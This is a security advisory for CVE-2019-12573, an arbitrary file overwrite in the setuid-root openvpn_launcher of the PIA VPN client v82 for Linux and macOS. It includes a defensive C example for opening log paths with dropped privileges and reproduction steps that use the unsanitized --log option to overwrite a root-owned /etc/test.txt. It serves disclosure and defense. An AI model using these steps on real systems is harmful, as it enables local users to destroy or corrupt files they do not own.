Allele Security Alert
ASA-2019-00379
Identifier(s)
ASA-2019-00379, CVE-2019-12573
Title
Arbitrary File Overwrite
Vendor(s)
London Trust Media Private
Product(s)
Private Internet Access (PIA) VPN Client for Linux and macOS
Affected version(s)
Private Internet Access (PIA) VPN Client for Linux and macOS version v82
Fixed version(s)
Private Internet Access (PIA) VPN Client for Linux and macOS v1.2.1 or later
Proof of concept
Unknown
Description
A vulnerability in the London Trust Media Private Internet Access (PIA) VPN Client v82 for Linux and macOS could allow an authenticated, local attacker to overwrite arbitrary files.
Technical details
The PIA Linux and macOS openvpn_launcher binary is setuid root. This binary supports the --log option, which accepts a path as an argument. The --log parameter is not sanitized, which allows a local unprivileged user to overwrite arbitrary files owned by any user on the system, including root. This creates a denial of service condition and possible data loss if leveraged by a malicious local user.
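One way a setuid-root program can handle a caller-supplied log path so that the kernel enforces the invoking user's permissions. This is an added example, not PIA's code or the vendor's actual fix; the helper name open_log_as_caller and the log line it writes are hypothetical.

```c
#define _GNU_SOURCE   /* expose seteuid/setegid, dprintf and O_NOFOLLOW on glibc */
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

/* Hypothetical helper: open a caller-supplied log path with the invoking
 * user's credentials, so the user's file permissions apply instead of
 * root's. Returns a file descriptor, or -1 with errno set. */
int open_log_as_caller(const char *path)
{
    uid_t saved_euid = geteuid();
    gid_t saved_egid = getegid();
    int fd, err;

    /* Temporarily drop to the real IDs: group first, while still privileged. */
    if (setegid(getgid()) != 0 || seteuid(getuid()) != 0)
        abort();                    /* never continue with unknown privileges */

    /* O_NOFOLLOW: refuse a symlink as the final path component.
     * O_APPEND without O_TRUNC: existing contents are never clobbered.
     * 0600: a newly created log is private to the caller. */
    fd = open(path, O_WRONLY | O_CREAT | O_APPEND | O_NOFOLLOW | O_CLOEXEC, 0600);
    err = errno;

    /* Regain the saved IDs for the work that genuinely needs them. */
    if (seteuid(saved_euid) != 0 || setegid(saved_egid) != 0)
        abort();

    errno = err;
    return fd;
}

int main(int argc, char **argv)
{
    if (argc != 2) {
        fprintf(stderr, "usage: %s LOGFILE\n", argv[0]);
        return 2;
    }
    int fd = open_log_as_caller(argv[1]);
    if (fd < 0) {
        perror(argv[1]);            /* e.g. EACCES for a root-owned 0600 file */
        return 1;
    }
    dprintf(fd, "launcher started by uid %d\n", (int)getuid());
    close(fd);
    return 0;
}
```

Installed setuid root and run by an unprivileged user, the open() call is made with that user's effective UID and GID, so a path such as a root-owned mode 600 file is refused by the kernel rather than by path filtering in the program.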
Steps to reproduce
Step 1 – Create a root owned test file. For this PoC /etc/test.txt is used.
# As root
echo "this is a test" > /etc/test.txt
chmod 600 /etc/test.txt
Step 2 – Overwrite the file with the --log option as a non-privileged user.
# macOS
/Applications/Private\ Internet\ Access.app/Contents/Resources/openvpn_launcher --log /etc/test.txt

# Linux
/opt/pia/openvpn_launcher.64 --log /etc/test.txt
Step 3 – Verify the file contents have been overwritten.
# As root
cat /etc/test.txt
Credits
Rich Mirch
Reference(s)
PIA Linux, macOS Arbitrary File Overwrite
https://github.com/mirchr/security-research/blob/master/vulnerabilities/PIA/CVE-2019-12573.txt
CVE-2019-12573
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12573
CVE-2019-12573
https://nvd.nist.gov/vuln/detail/CVE-2019-12573
If there is any error in this alert or you wish a comprehensive analysis, let us know.
Last modified: June 25, 2019